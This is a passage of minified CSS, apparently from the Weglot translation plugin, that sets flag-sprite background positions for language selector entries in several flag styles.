!important}.weglot-flags.et>a:before,.weglot-flags.et>span:before{background-position:-2640px 0 !important}.weglot-flags.fj>a:before,.weglot-flags.fj>span:before{background-position:-1710px 0 !important}.weglot-flags.fi>a:before,.weglot-flags.fi>span:before{background-position:-2550px 0 !important}.weglot-flags.fr>a:before,.weglot-flags.fr>span:before{background-position:-2520px 0 !important}.weglot-flags.gl>a:before,.weglot-flags.gl>span:before{background-position:-7290px 0 !important}.weglot-flags.ka>a:before,.weglot-flags.ka>span:before{background-position:-5040px 0 !important}.weglot-flags.de>a:before,.weglot-flags.de>span:before{background-position:-2490px 0 !important}.weglot-flags.el>a:before,.weglot-flags.el>span:before{background-position:-2460px 0 !important}.weglot-flags.gu>a:before,.weglot-flags.gu>span:before{background-position:-1170px 0 !important}.weglot-flags.ht>a:before,.weglot-flags.ht>span:before{background-position:-4650px 0 !important}.weglot-flags.ha>a:before,.weglot-flags.ha>span:before{background-position:-900px 0 !important}.weglot-flags.he>a:before,.weglot-flags.he>span:before{background-position:-1050px 0 !important}.weglot-flags.hi>a:before,.weglot-flags.hi>span:before{background-position:-1170px 0 !important}.weglot-flags.hu>a:before,.weglot-flags.hu>span:before{background-position:-2430px 0 !important}.weglot-flags.is>a:before,.weglot-flags.is>span:before{background-position:-2400px 0 !important}.weglot-flags.ig>a:before,.weglot-flags.ig>span:before{background-position:-870px 0 !important}.weglot-flags.id>a:before,.weglot-flags.id>span:before{background-position:-3510px 0 !important}.weglot-flags.ga>a:before,.weglot-flags.ga>span:before{background-position:-2340px 0 !important}.weglot-flags.it>a:before,.weglot-flags.it>span:before{background-position:-2310px 0 !important}.weglot-flags.ja>a:before,.weglot-flags.ja>span:before{background-position:-3480px 0 !important}.weglot-flags.jv>a:before,.weglot-flags.jv>span:before{background-position:-3360px 0 !important}.weglot-flags.kn>a:before,.weglot-flags.kn>span:before{background-position:-1170px 0 !important}.weglot-flags.kk>a:before,.weglot-flags.kk>span:before{background-position:-3150px 0 !important}.weglot-flags.ko>a:before,.weglot-flags.ko>span:before{background-position:-6990px 0 !important}.weglot-flags.ku>a:before,.weglot-flags.ku>span:before{background-position:-2430px 0 !important}.weglot-flags.ky>a:before,.weglot-flags.ky>span:before{background-position:-3420px 0 !important}.weglot-flags.lo>a:before,.weglot-flags.lo>span:before{background-position:-3450px 0 !important}.weglot-flags.la>a:before,.weglot-flags.la>span:before{background-position:-2310px 0 !important}.weglot-flags.lv>a:before,.weglot-flags.lv>span:before{background-position:-2280px 0 !important}.weglot-flags.lt>a:before,.weglot-flags.lt>span:before{background-position:-2250px 0 !important}.weglot-flags.lb>a:before,.weglot-flags.lb>span:before{background-position:-2220px 0 !important}.weglot-flags.mk>a:before,.weglot-flags.mk>span:before{background-position:-2190px 0 !important}.weglot-flags.mg>a:before,.weglot-flags.mg>span:before{background-position:-1200px 0 !important}.weglot-flags.ms>a:before,.weglot-flags.ms>span:before{background-position:-3360px 0 !important}.weglot-flags.ml>a:before,.weglot-flags.ml>span:before{background-position:-1170px 0 !important}.weglot-flags.mt>a:before,.weglot-flags.mt>span:before{background-position:-2130px 0 !important}.weglot-flags.mi>a:before,.weglot-flags.mi>span:before{background-position:-3240px 0 !important}.weglot-flags.mr>a:before,.weglot-flags.mr>span:before{background-position:-1170px 0 !important}.weglot-flags.mn>a:before,.weglot-flags.mn>span:before{background-position:-6000px 0 !important}.weglot-flags.ne>a:before,.weglot-flags.ne>span:before{background-position:-3270px 0 !important}.weglot-flags.no>a:before,.weglot-flags.no>span:before{background-position:-5850px 0 !important}.weglot-flags.ps>a:before,.weglot-flags.ps>span:before{background-position:-5189px 0 !important}.weglot-flags.fa>a:before,.weglot-flags.fa>span:before{background-position:-6690px 0 !important}.weglot-flags.pl>a:before,.weglot-flags.pl>span:before{background-position:-2160px 0 !important}.weglot-flags.pt>a:before,.weglot-flags.pt>span:before{background-position:-1740px 0 !important}.weglot-flags.pa>a:before,.weglot-flags.pa>span:before{background-position:-3180px 0 !important}.weglot-flags.ro>a:before,.weglot-flags.ro>span:before{background-position:-2070px 0 !important}.weglot-flags.ru>a:before,.weglot-flags.ru>span:before{background-position:-2040px 0 !important}.weglot-flags.sm>a:before,.weglot-flags.sm>span:before{background-position:-4620px 0 !important}.weglot-flags.gd>a:before,.weglot-flags.gd>span:before{background-position:-30px 0 !important}.weglot-flags.sr>a:before,.weglot-flags.sr>span:before{background-position:-4290px 0 !important}.weglot-flags.sn>a:before,.weglot-flags.sn>span:before{background-position:-540px 0 !important}.weglot-flags.sd>a:before,.weglot-flags.sd>span:before{background-position:-3180px 0 !important}.weglot-flags.si>a:before,.weglot-flags.si>span:before{background-position:-2820px 0 !important}.weglot-flags.sk>a:before,.weglot-flags.sk>span:before{background-position:-6810px 0 !important}.weglot-flags.sl>a:before,.weglot-flags.sl>span:before{background-position:-2010px 0 !important}.weglot-flags.so>a:before,.weglot-flags.so>span:before{background-position:-4560px 0 !important}.weglot-flags.st>a:before,.weglot-flags.st>span:before{background-position:-4830px 0 !important}.weglot-flags.es>a:before,.weglot-flags.es>span:before{background-position:-480px 0 !important}.weglot-flags.su>a:before,.weglot-flags.su>span:before{background-position:-4530px 0 !important}.weglot-flags.sw>a:before,.weglot-flags.sw>span:before{background-position:-1290px 0 !important}.weglot-flags.sv>a:before,.weglot-flags.sv>span:before{background-position:-1980px 0 !important}.weglot-flags.tl>a:before,.weglot-flags.tl>span:before{background-position:-3060px 0 !important}.weglot-flags.ty>a:before,.weglot-flags.ty>span:before{background-position:-6270px 0 !important}.weglot-flags.tg>a:before,.weglot-flags.tg>span:before{background-position:-2940px 0 !important}.weglot-flags.ta>a:before,.weglot-flags.ta>span:before{background-position:-1170px 0 !important}.weglot-flags.tt>a:before,.weglot-flags.tt>span:before{background-position:-2040px 0 !important}.weglot-flags.te>a:before,.weglot-flags.te>span:before{background-position:-1170px 0 !important}.weglot-flags.th>a:before,.weglot-flags.th>span:before{background-position:-2910px 0 !important}.weglot-flags.to>a:before,.weglot-flags.to>span:before{background-position:-6540px 0 !important}.weglot-flags.tr>a:before,.weglot-flags.tr>span:before{background-position:-1950px 0 !important}.weglot-flags.uk>a:before,.weglot-flags.uk>span:before{background-position:-1890px 0 !important}.weglot-flags.ur>a:before,.weglot-flags.ur>span:before{background-position:-3180px 0 !important}.weglot-flags.uz>a:before,.weglot-flags.uz>span:before{background-position:-2880px 0 !important}.weglot-flags.vi>a:before,.weglot-flags.vi>span:before{background-position:-2850px 0 !important}.weglot-flags.cy>a:before,.weglot-flags.cy>span:before{background-position:-6420px 0 !important}.weglot-flags.fy>a:before,.weglot-flags.fy>span:before{background-position:-2100px 0 !important}.weglot-flags.xh>a:before,.weglot-flags.xh>span:before{background-position:-6570px 0 !important}.weglot-flags.yi>a:before,.weglot-flags.yi>span:before{background-position:-1050px 0 !important}.weglot-flags.yo>a:before,.weglot-flags.yo>span:before{background-position:-870px 0 !important}.weglot-flags.zu>a:before,.weglot-flags.zu>span:before{background-position:-6570px 0 !important}.weglot-flags.flag-1.hw>a:before,.weglot-flags.flag-1.hw>span:before{background-position:-7840px 0 !important}.weglot-flags.flag-1.fl>a:before,.weglot-flags.flag-1.fl>span:before{background-position:2560px 0 !important}.weglot-flags.flag-1.af>a:before,.weglot-flags.flag-1.af>span:before{background-position:-6848px 0 !important}.weglot-flags.flag-1.sq>a:before,.weglot-flags.flag-1.sq>span:before{background-position:-97px 0 !important}.weglot-flags.flag-1.am>a:before,.weglot-flags.flag-1.am>span:before{background-position:-2369px 0 !important}.weglot-flags.flag-1.ar>a:before,.weglot-flags.flag-1.ar>span:before{background-position:-6465px 0 !important}.weglot-flags.flag-1.hy>a:before,.weglot-flags.flag-1.hy>span:before{background-position:-385px 0 !important}.weglot-flags.flag-1.az>a:before,.weglot-flags.flag-1.az>span:before{background-position:-513px 0 !important}.weglot-flags.flag-1.ba>a:before,.weglot-flags.flag-1.ba>span:before{background-position:-6113px 0 !important}.weglot-flags.flag-1.eu>a:before,.weglot-flags.flag-1.eu>span:before{background-position:-8353px 0 !important}.weglot-flags.flag-1.be>a:before,.weglot-flags.flag-1.be>span:before{background-position:-705px 0 !important}.weglot-flags.flag-1.bn>a:before,.weglot-flags.flag-1.bn>span:before{background-position:-609px 0 !important}.weglot-flags.flag-1.bs>a:before,.weglot-flags.flag-1.bs>span:before{background-position:-929px 0 !important}.weglot-flags.flag-1.bg>a:before,.weglot-flags.flag-1.bg>span:before{background-position:-1121px 0 !important}.weglot-flags.flag-1.br>a:before,.weglot-flags.flag-1.br>span:before{background-position:-993px 0 !important}.weglot-flags.flag-1.my>a:before,.weglot-flags.flag-1.my>span:before{background-position:-4929px 0 !important}.weglot-flags.flag-1.ca>a:before,.weglot-flags.flag-1.ca>span:before{background-position:-8321px 0 !important}.weglot-flags.flag-1.zh>a:before,.weglot-flags.flag-1.zh>span:before{background-position:-1505px 0 !important}.weglot-flags.flag-1.tw>a:before,.weglot-flags.flag-1.tw>span:before{background-position:-6369px 0 !important}.weglot-flags.flag-1.km>a:before,.weglot-flags.flag-1.km>span:before{background-position:-1217px 0 !important}.weglot-flags.flag-1.ny>a:before,.weglot-flags.flag-1.ny>span:before{background-position:-4289px 0 !important}.weglot-flags.flag-1.co>a:before,.weglot-flags.flag-1.co>span:before{background-position:-2561px 0 !important}.weglot-flags.flag-1.hr>a:before,.weglot-flags.flag-1.hr>span:before{background-position:-1793px 0 !important}.weglot-flags.flag-1.cs>a:before,.weglot-flags.flag-1.cs>span:before{background-position:-1921px 0 !important}.weglot-flags.flag-1.da>a:before,.weglot-flags.flag-1.da>span:before{background-position:-1985px 0 !important}.weglot-flags.flag-1.nl>a:before,.weglot-flags.flag-1.nl>span:before{background-position:-5121px 0 !important}.weglot-flags.flag-1.en>a:before,.weglot-flags.flag-1.en>span:before{background-position:-7777px 0 !important}.weglot-flags.flag-1.eo>a:before,.weglot-flags.flag-1.eo>span:before{background-position:-7777px 0 !important}.weglot-flags.flag-1.et>a:before,.weglot-flags.flag-1.et>span:before{background-position:-2337px 0 !important}.weglot-flags.flag-1.fj>a:before,.weglot-flags.flag-1.fj>span:before{background-position:-2497px 0 !important}.weglot-flags.flag-1.fi>a:before,.weglot-flags.flag-1.fi>span:before{background-position:-2529px 0 !important}.weglot-flags.flag-1.fr>a:before,.weglot-flags.flag-1.fr>span:before{background-position:-2561px 0 !important}.weglot-flags.flag-1.gl>a:before,.weglot-flags.flag-1.gl>span:before{background-position:-8383px 0 !important}.weglot-flags.flag-1.ka>a:before,.weglot-flags.flag-1.ka>span:before{background-position:-2721px 0 !important}.weglot-flags.flag-1.de>a:before,.weglot-flags.flag-1.de>span:before{background-position:-2753px 0 !important}.weglot-flags.flag-1.el>a:before,.weglot-flags.flag-1.el>span:before{background-position:-2881px 0 !important}.weglot-flags.flag-1.gu>a:before,.weglot-flags.flag-1.gu>span:before{background-position:-3329px 0 !important}.weglot-flags.flag-1.ht>a:before,.weglot-flags.flag-1.ht>span:before{background-position:-3169px 0 !important}.weglot-flags.flag-1.ha>a:before,.weglot-flags.flag-1.ha>span:before{background-position:-5281px 0 !important}.weglot-flags.flag-1.he>a:before,.weglot-flags.flag-1.he>span:before{background-position:-3521px 0 !important}.weglot-flags.flag-1.hi>a:before,.weglot-flags.flag-1.hi>span:before{background-position:-3329px 0 !important}.weglot-flags.flag-1.hu>a:before,.weglot-flags.flag-1.hu>span:before{background-position:-3265px 0 !important}.weglot-flags.flag-1.is>a:before,.weglot-flags.flag-1.is>span:before{background-position:-3297px 0 !important}.weglot-flags.flag-1.ig>a:before,.weglot-flags.flag-1.ig>span:before{background-position:-5313px 0 !important}.weglot-flags.flag-1.id>a:before,.weglot-flags.flag-1.id>span:before{background-position:-3361px 0 !important}.weglot-flags.flag-1.ga>a:before,.weglot-flags.flag-1.ga>span:before{background-position:-3457px 0 !important}.weglot-flags.flag-1.it>a:before,.weglot-flags.flag-1.it>span:before{background-position:-3553px 0 !important}.weglot-flags.flag-1.ja>a:before,.weglot-flags.flag-1.ja>span:before{background-position:-3617px 0 !important}.weglot-flags.flag-1.jv>a:before,.weglot-flags.flag-1.jv>span:before{background-position:-4321px 0 !important}.weglot-flags.flag-1.kn>a:before,.weglot-flags.flag-1.kn>span:before{background-position:-3329px 0 !important}.weglot-flags.flag-1.kk>a:before,.weglot-flags.flag-1.kk>span:before{background-position:-3713px 0 !important}.weglot-flags.flag-1.ko>a:before,.weglot-flags.flag-1.ko>span:before{background-position:-6913px 0 !important}.weglot-flags.flag-1.ku>a:before,.weglot-flags.flag-1.ku>span:before{background-position:-3265px 0 !important}.weglot-flags.flag-1.ky>a:before,.weglot-flags.flag-1.ky>span:before{background-position:-3873px 0 !important}.weglot-flags.flag-1.lo>a:before,.weglot-flags.flag-1.lo>span:before{background-position:-3904px 0 !important}.weglot-flags.flag-1.la>a:before,.weglot-flags.flag-1.la>span:before{background-position:-3553px 0 !important}.weglot-flags.flag-1.lv>a:before,.weglot-flags.flag-1.lv>span:before{background-position:-3937px 0 !important}.weglot-flags.flag-1.lt>a:before,.weglot-flags.flag-1.lt>span:before{background-position:-4129px 0 !important}.weglot-flags.flag-1.lb>a:before,.weglot-flags.flag-1.lb>span:before{background-position:-4161px 0 !important}.weglot-flags.flag-1.mk>a:before,.weglot-flags.flag-1.mk>span:before{background-position:-4225px 0 !important}.weglot-flags.flag-1.mg>a:before,.weglot-flags.flag-1.mg>span:before{background-position:-4257px 0 !important}.weglot-flags.flag-1.ms>a:before,.weglot-flags.flag-1.ms>span:before{background-position:-4321px 0 !important}.weglot-flags.flag-1.ml>a:before,.weglot-flags.flag-1.ml>span:before{background-position:-3329px 0 !important}.weglot-flags.flag-1.mt>a:before,.weglot-flags.flag-1.mt>span:before{background-position:-4417px 0 !important}.weglot-flags.flag-1.mi>a:before,.weglot-flags.flag-1.mi>span:before{background-position:-5217px 0 !important}.weglot-flags.flag-1.mr>a:before,.weglot-flags.flag-1.mr>span:before{background-position:-3329px 0 !important}.weglot-flags.flag-1.mn>a:before,.weglot-flags.flag-1.mn>span:before{background-position:-4769px 0 !important}.weglot-flags.flag-1.ne>a:before,.weglot-flags.flag-1.ne>span:before{background-position:-5091px 0 !important}.weglot-flags.flag-1.no>a:before,.weglot-flags.flag-1.no>span:before{background-position:-5505px 0 !important}.weglot-flags.flag-1.ps>a:before,.weglot-flags.flag-1.ps>span:before{background-position:-33px 0 !important}.weglot-flags.flag-1.fa>a:before,.weglot-flags.flag-1.fa>span:before{background-position:-3393px 0 !important}.weglot-flags.flag-1.pl>a:before,.weglot-flags.flag-1.pl>span:before{background-position:-5889px 0 !important}.weglot-flags.flag-1.pt>a:before,.weglot-flags.flag-1.pt>span:before{background-position:-5921px 0 !important}.weglot-flags.flag-1.pa>a:before,.weglot-flags.flag-1.pa>span:before{background-position:-3329px 0 !important}.weglot-flags.flag-1.ro>a:before,.weglot-flags.flag-1.ro>span:before{background-position:-6081px 0 !important}.weglot-flags.flag-1.ru>a:before,.weglot-flags.flag-1.ru>span:before{background-position:-6113px 0 !important}.weglot-flags.flag-1.sm>a:before,.weglot-flags.flag-1.sm>span:before{background-position:-6369px 0 !important}.weglot-flags.flag-1.gd>a:before,.weglot-flags.flag-1.gd>span:before{background-position:-6497px 0 !important}.weglot-flags.flag-1.sr>a:before,.weglot-flags.flag-1.sr>span:before{background-position:-6561px 0 !important}.weglot-flags.flag-1.sn>a:before,.weglot-flags.flag-1.sn>span:before{background-position:-8287px 0 !important}.weglot-flags.flag-1.sd>a:before,.weglot-flags.flag-1.sd>span:before{background-position:-5601px 0 !important}.weglot-flags.flag-1.si>a:before,.weglot-flags.flag-1.si>span:before{background-position:-7039px 0 !important}.weglot-flags.flag-1.sk>a:before,.weglot-flags.flag-1.sk>span:before{background-position:-6689px 0 !important}.weglot-flags.flag-1.sl>a:before,.weglot-flags.flag-1.sl>span:before{background-position:-6721px 0 !important}.weglot-flags.flag-1.so>a:before,.weglot-flags.flag-1.so>span:before{background-position:-6785px 0 !important}.weglot-flags.flag-1.st>a:before,.weglot-flags.flag-1.st>span:before{background-position:-4001px 0 !important}.weglot-flags.flag-1.es>a:before,.weglot-flags.flag-1.es>span:before{background-position:-7009px 0 !important}.weglot-flags.flag-1.su>a:before,.weglot-flags.flag-1.su>span:before{background-position:-7073px 0 !important}.weglot-flags.flag-1.sw>a:before,.weglot-flags.flag-1.sw>span:before{background-position:-3745px 0 !important}.weglot-flags.flag-1.sv>a:before,.weglot-flags.flag-1.sv>span:before{background-position:-7169px 0 !important}.weglot-flags.flag-1.tl>a:before,.weglot-flags.flag-1.tl>span:before{background-position:-5823px 0 !important}.weglot-flags.flag-1.ty>a:before,.weglot-flags.flag-1.ty>span:before{background-position:-2593px 0 !important}.weglot-flags.flag-1.tg>a:before,.weglot-flags.flag-1.tg>span:before{background-position:-7297px 0 !important}.weglot-flags.flag-1.ta>a:before,.weglot-flags.flag-1.ta>span:before{background-position:-3329px 0 !important}.weglot-flags.flag-1.tt>a:before,.weglot-flags.flag-1.tt>span:before{background-position:-6113px 0 !important}.weglot-flags.flag-1.te>a:before,.weglot-flags.flag-1.te>span:before{background-position:-3329px 0 !important}.weglot-flags.flag-1.th>a:before,.weglot-flags.flag-1.th>span:before{background-position:-7361px 0 !important}.weglot-flags.flag-1.to>a:before,.weglot-flags.flag-1.to>span:before{background-position:-7456px 0 !important}.weglot-flags.flag-1.tr>a:before,.weglot-flags.flag-1.tr>span:before{background-position:-7553px 0 !important}.weglot-flags.flag-1.uk>a:before,.weglot-flags.flag-1.uk>span:before{background-position:-7713px 0 !important}.weglot-flags.flag-1.ur>a:before,.weglot-flags.flag-1.ur>span:before{background-position:-5600px 0 !important}.weglot-flags.flag-1.uz>a:before,.weglot-flags.flag-1.uz>span:before{background-position:-7969px 0 !important}.weglot-flags.flag-1.vi>a:before,.weglot-flags.flag-1.vi>span:before{background-position:-8097px 0 !important}.weglot-flags.flag-1.cy>a:before,.weglot-flags.flag-1.cy>span:before{background-position:-8129px 0 !important}.weglot-flags.flag-1.fy>a:before,.weglot-flags.flag-1.fy>span:before{background-position:-5121px 0 !important}.weglot-flags.flag-1.xh>a:before,.weglot-flags.flag-1.xh>span:before{background-position:-6848px 0 !important}.weglot-flags.flag-1.yi>a:before,.weglot-flags.flag-1.yi>span:before{background-position:-3521px 0 !important}.weglot-flags.flag-1.yo>a:before,.weglot-flags.flag-1.yo>span:before{background-position:-5313px 0 !important}.weglot-flags.flag-1.zu>a:before,.weglot-flags.flag-1.zu>span:before{background-position:-6848px 0 !important}.weglot-flags.flag-2.hw>a:before,.weglot-flags.flag-2.hw>span:before{background-position:-5448px 0 !important}.weglot-flags.flag-2.fl>a:before,.weglot-flags.flag-2.fl>span:before{background-position:-1008px 0 !important}.weglot-flags.flag-2.af>a:before,.weglot-flags.flag-2.af>span:before{background-position:-4968px 0 !important}.weglot-flags.flag-2.sq>a:before,.weglot-flags.flag-2.sq>span:before{background-position:-2976px 0 !important}.weglot-flags.flag-2.am>a:before,.weglot-flags.flag-2.am>span:before{background-position:-3816px 0 !important}.weglot-flags.flag-2.ar>a:before,.weglot-flags.flag-2.ar>span:before{background-position:-768px 0 !important}.weglot-flags.flag-2.hy>a:before,.weglot-flags.flag-2.hy>span:before{background-position:0 0 !important}.weglot-flags.flag-2.az>a:before,.weglot-flags.flag-2.az>span:before{background-position:-5136px 0 !important}.weglot-flags.flag-2.ba>a:before,.weglot-flags.flag-2.ba>span:before{background-position:-936px 0 !important}.weglot-flags.flag-2.eu>a:before,.weglot-flags.flag-2.eu>span:before{background-position:-5376px 0 !important}.weglot-flags.flag-2.be>a:before,.weglot-flags.flag-2.be>span:before{background-position:-4224px 0 !important}.weglot-flags.flag-2.bn>a:before,.weglot-flags.flag-2.bn>span:before{background-position:-4056px 0 !important}.weglot-flags.flag-2.bs>a:before,.weglot-flags.flag-2.bs>span:before{background-position:-3984px 0 !important}.weglot-flags.flag-2.bg>a:before,.weglot-flags.flag-2.bg>span:before{background-position:-5040px 0 !important}.weglot-flags.flag-2.br>a:before,.weglot-flags.flag-2.br>span:before{background-position:-2784px 0 !important}.weglot-flags.flag-2.my>a:before,.weglot-flags.flag-2.my>span:before{background-position:-1248px 0 !important}.weglot-flags.flag-2.ca>a:before,.weglot-flags.flag-2.ca>span:before{background-position:-5352px 0 !important}.weglot-flags.flag-2.zh>a:before,.weglot-flags.flag-2.zh>span:before{background-position:-2592px 0 !important}.weglot-flags.flag-2.tw>a:before,.weglot-flags.flag-2.tw>span:before{background-position:-3408px 0 !important}.weglot-flags.flag-2.km>a:before,.weglot-flags.flag-2.km>span:before{background-position:-5160px 0 !important}.weglot-flags.flag-2.ny>a:before,.weglot-flags.flag-2.ny>span:before{background-position:-1392px 0 !important}.weglot-flags.flag-2.co>a:before,.weglot-flags.flag-2.co>span:before{background-position:-2304px 0 !important}.weglot-flags.flag-2.hr>a:before,.weglot-flags.flag-2.hr>span:before{background-position:-4416px 0 !important}.weglot-flags.flag-2.cs>a:before,.weglot-flags.flag-2.cs>span:before{background-position:-2472px 0 !important}.weglot-flags.flag-2.da>a:before,.weglot-flags.flag-2.da>span:before{background-position:-2448px 0 !important}.weglot-flags.flag-2.nl>a:before,.weglot-flags.flag-2.nl>span:before{background-position:-1296px 0 !important}.weglot-flags.flag-2.en>a:before,.weglot-flags.flag-2.en>span:before{background-position:-312px 0 !important}.weglot-flags.flag-2.eo>a:before,.weglot-flags.flag-2.eo>span:before{background-position:-312px 0 !important}.weglot-flags.flag-2.et>a:before,.weglot-flags.flag-2.et>span:before{background-position:-2424px 0 !important}.weglot-flags.flag-2.fj>a:before,.weglot-flags.flag-2.fj>span:before{background-position:-576px 0 !important}.weglot-flags.flag-2.fi>a:before,.weglot-flags.flag-2.fi>span:before{background-position:-2328px 0 !important}.weglot-flags.flag-2.fr>a:before,.weglot-flags.flag-2.fr>span:before{background-position:-2304px 0 !important}.weglot-flags.flag-2.gl>a:before,.weglot-flags.flag-2.gl>span:before{background-position:-5400px 0 !important}.weglot-flags.flag-2.ka>a:before,.weglot-flags.flag-2.ka>span:before{background-position:-3744px 0 !important}.weglot-flags.flag-2.de>a:before,.weglot-flags.flag-2.de>span:before{background-position:-2256px 0 !important}.weglot-flags.flag-2.el>a:before,.weglot-flags.flag-2.el>span:before{background-position:-2208px 0 !important}.weglot-flags.flag-2.gu>a:before,.weglot-flags.flag-2.gu>span:before{background-position:-1728px 0 !important}.weglot-flags.flag-2.ht>a:before,.weglot-flags.flag-2.ht>span:before{background-position:-3528px 0 !important}.weglot-flags.flag-2.ha>a:before,.weglot-flags.flag-2.ha>span:before{background-position:-1176px 0 !important}.weglot-flags.flag-2.he>a:before,.weglot-flags.flag-2.he>span:before{background-position:-1992px 0 !important}.weglot-flags.flag-2.hi>a:before,.weglot-flags.flag-2.hi>span:before{background-position:-1728px 0 !important}.weglot-flags.flag-2.hu>a:before,.weglot-flags.flag-2.hu>span:before{background-position:-2088px 0 !important}.weglot-flags.flag-2.is>a:before,.weglot-flags.flag-2.is>span:before{background-position:-2064px 0 !important}.weglot-flags.flag-2.ig>a:before,.weglot-flags.flag-2.ig>span:before{background-position:-1103px 0 !important}.weglot-flags.flag-2.id>a:before,.weglot-flags.flag-2.id>span:before{background-position:-2040px 0 !important}.weglot-flags.flag-2.ga>a:before,.weglot-flags.flag-2.ga>span:before{background-position:-2016px 0 !important}.weglot-flags.flag-2.it>a:before,.weglot-flags.flag-2.it>span:before{background-position:-1968px 0 !important}.weglot-flags.flag-2.ja>a:before,.weglot-flags.flag-2.ja>span:before{background-position:-1920px 0 !important}.weglot-flags.flag-2.jv>a:before,.weglot-flags.flag-2.jv>span:before{background-position:-1536px 0 !important}.weglot-flags.flag-2.kn>a:before,.weglot-flags.flag-2.kn>span:before{background-position:-1728px 0 !important}.weglot-flags.flag-2.kk>a:before,.weglot-flags.flag-2.kk>span:before{background-position:-1704px 0 !important}.weglot-flags.flag-2.ko>a:before,.weglot-flags.flag-2.ko>span:before{background-position:-1848px 0 !important}.weglot-flags.flag-2.ku>a:before,.weglot-flags.flag-2.ku>span:before{background-position:-2088px 0 !important}.weglot-flags.flag-2.ky>a:before,.weglot-flags.flag-2.ky>span:before{background-position:-1800px 0 !important}.weglot-flags.flag-2.lo>a:before,.weglot-flags.flag-2.lo>span:before{background-position:-1776px 0 !important}.weglot-flags.flag-2.la>a:before,.weglot-flags.flag-2.la>span:before{background-position:-1968px 0 !important}.weglot-flags.flag-2.lv>a:before,.weglot-flags.flag-2.lv>span:before{background-position:-1752px 0 !important}.weglot-flags.flag-2.lt>a:before,.weglot-flags.flag-2.lt>span:before{background-position:-1656px 0 !important}.weglot-flags.flag-2.lb>a:before,.weglot-flags.flag-2.lb>span:before{background-position:-1632px 0 !important}.weglot-flags.flag-2.mk>a:before,.weglot-flags.flag-2.mk>span:before{background-position:-1440px 0 !important}.weglot-flags.flag-2.mg>a:before,.weglot-flags.flag-2.mg>span:before{background-position:-1560px 0 !important}.weglot-flags.flag-2.ms>a:before,.weglot-flags.flag-2.ms>span:before{background-position:-1536px 0 !important}.weglot-flags.flag-2.ml>a:before,.weglot-flags.flag-2.ml>span:before{background-position:-1728px 0 !important}.weglot-flags.flag-2.mt>a:before,.weglot-flags.flag-2.mt>span:before{background-position:-1200px 0 !important}.weglot-flags.flag-2.mi>a:before,.weglot-flags.flag-2.mi>span:before{background-position:-1224px 0 !important}.weglot-flags.flag-2.mr>a:before,.weglot-flags.flag-2.mr>span:before{background-position:-1728px 0 !important}.weglot-flags.flag-2.mn>a:before,.weglot-flags.flag-2.mn>span:before{background-position:-4800px 0 !important}.weglot-flags.flag-2.ne>a:before,.weglot-flags.flag-2.ne>span:before{background-position:-1320px 0 !important}.weglot-flags.flag-2.no>a:before,.weglot-flags.flag-2.no>span:before{background-position:-4776px 0 !important}.weglot-flags.flag-2.ps>a:before,.weglot-flags.flag-2.ps>span:before{background-position:-4008px 0 !important}.weglot-flags.flag-2.fa>a:before,.weglot-flags.flag-2.fa>span:before{background-position:-5088px 0 !important}.weglot-flags.flag-2.pl>a:before,.weglot-flags.flag-2.pl>span:before{background-position:-984px 0 !important}.weglot-flags.flag-2.pt>a:before,.weglot-flags.flag-2.pt>span:before{background-position:-528px 0 !important}.weglot-flags.flag-2.pa>a:before,.weglot-flags.flag-2.pa>span:before{background-position:-1728px 0 !important}.weglot-flags.flag-2.ro>a:before,.weglot-flags.flag-2.ro>span:before{background-position:-960px 0 !important}.weglot-flags.flag-2.ru>a:before,.weglot-flags.flag-2.ru>span:before{background-position:-936px 0 !important}.weglot-flags.flag-2.sm>a:before,.weglot-flags.flag-2.sm>span:before{background-position:-3408px 0 !important}.weglot-flags.flag-2.gd>a:before,.weglot-flags.flag-2.gd>span:before{background-position:-4872px 0 !important}.weglot-flags.flag-2.sr>a:before,.weglot-flags.flag-2.sr>span:before{background-position:-3120px 0 !important}.weglot-flags.flag-2.sn>a:before,.weglot-flags.flag-2.sn>span:before{background-position:-72px 0 !important}.weglot-flags.flag-2.sd>a:before,.weglot-flags.flag-2.sd>span:before{background-position:-1128px 0 !important}.weglot-flags.flag-2.si>a:before,.weglot-flags.flag-2.si>span:before{background-position:-480px 0 !important}.weglot-flags.flag-2.sk>a:before,.weglot-flags.flag-2.sk>span:before{background-position:-4152px 0 !important}.weglot-flags.flag-2.sl>a:before,.weglot-flags.flag-2.sl>span:before{background-position:-696px 0 !important}.weglot-flags.flag-2.so>a:before,.weglot-flags.flag-2.so>span:before{background-position:-3336px 0 !important}.weglot-flags.flag-2.st>a:before,.weglot-flags.flag-2.st>span:before{background-position:-3552px 0 !important}.weglot-flags.flag-2.es>a:before,.weglot-flags.flag-2.es>span:before{background-position:-96px 0 !important}.weglot-flags.flag-2.su>a:before,.weglot-flags.flag-2.su>span:before{background-position:-3312px 0 !important}.weglot-flags.flag-2.sw>a:before,.weglot-flags.flag-2.sw>span:before{background-position:-1872px 0 !important}.weglot-flags.flag-2.sv>a:before,.weglot-flags.flag-2.sv>span:before{background-position:-552px 0 !important}.weglot-flags.flag-2.tl>a:before,.weglot-flags.flag-2.tl>span:before{background-position:-1008px 0 !important}.weglot-flags.flag-2.ty>a:before,.weglot-flags.flag-2.ty>span:before{background-position:-4512px 0 !important}.weglot-flags.flag-2.tg>a:before,.weglot-flags.flag-2.tg>span:before{background-position:-264px 0 !important}.weglot-flags.flag-2.ta>a:before,.weglot-flags.flag-2.ta>span:before{background-position:-1728px 0 !important}.weglot-flags.flag-2.tt>a:before,.weglot-flags.flag-2.tt>span:before{background-position:-936px 0 !important}.weglot-flags.flag-2.te>a:before,.weglot-flags.flag-2.te>span:before{background-position:-1728px 0 !important}.weglot-flags.flag-2.th>a:before,.weglot-flags.flag-2.th>span:before{background-position:-456px 0 !important}.weglot-flags.flag-2.to>a:before,.weglot-flags.flag-2.to>span:before{background-position:-3264px 0 !important}.weglot-flags.flag-2.tr>a:before,.weglot-flags.flag-2.tr>span:before{background-position:-360px 0 !important}.weglot-flags.flag-2.uk>a:before,.weglot-flags.flag-2.uk>span:before{background-position:-288px 0 !important}.weglot-flags.flag-2.ur>a:before,.weglot-flags.flag-2.ur>span:before{background-position:-1128px 0 !important}.weglot-flags.flag-2.uz>a:before,.weglot-flags.flag-2.uz>span:before{background-position:-240px 0 !important}.weglot-flags.flag-2.vi>a:before,.weglot-flags.flag-2.vi>span:before{background-position:-144px 0 !important}.weglot-flags.flag-2.cy>a:before,.weglot-flags.flag-2.cy>span:before{background-position:-4848px 0 !important}.weglot-flags.flag-2.fy>a:before,.weglot-flags.flag-2.fy>span:before{background-position:-1296px 0 !important}.weglot-flags.flag-2.xh>a:before,.weglot-flags.flag-2.xh>span:before{background-position:-4968px 0 